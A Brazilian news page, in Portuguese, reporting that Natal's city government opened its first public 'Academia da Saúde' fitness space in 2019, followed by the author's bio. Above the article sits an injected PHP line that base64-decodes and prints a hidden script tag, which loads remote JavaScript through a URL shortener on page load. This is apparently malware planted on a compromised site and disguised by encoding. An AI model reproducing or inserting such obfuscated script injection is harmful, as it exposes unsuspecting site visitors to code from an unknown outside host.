$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

Prefeitura entrega primeira Academia da Saúde na zona Oeste

Prefeitura entrega primeira Academia da Saúde na zona Oeste
12 Set 2019

A Prefeitura Municipal do Natal entregou a primeira Academia da Saúde que fica localizada Rua Santas Isabel, s/n, Felipe Camarão, região pertencente ao Distrito Sanitário Oeste. Obra com área construída de 115 m² e área externa de 822,24 m². O valor do espaço foi orçado em R$ 216.141,64, oriundos do Ministério da Saúde e da Prefeitura do Natal. 

O equipamento faz parte do Programa Academia da Saúde, do Ministério da Saúde, e tem como objetivo principal contribuir para a promoção da saúde e produção do cuidado e de modos de vida saudáveis da população. É um espaço público construído para o desenvolvimento de ações do Programa da Academia da Saúde, que será supervisionado, diariamente, por educadores físicos. 

O espaço terá atividades físicas, práticas corporais, práticas artísticas e culturais, Práticas Integrativas e complementares (PICS), promoção de alimentação saudável e orientações de autocuidado.  A Academia da Saúde dispõe de sala de vivência, sala de acolhimento, sala para depósito e dois banheiros. A área externa dispõe de equipamentos para atividade física como barra paralela, barra horizontal, barra marinheiros, barra horizontal de apoio, espaldar, além de bancos e área de jardim. 

A Prefeitura pretende entregar ainda em 2019 a segunda Academia da Saúde de Natal, localizada no conjunto Parque das Dunas, na zona Norte do município. 

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *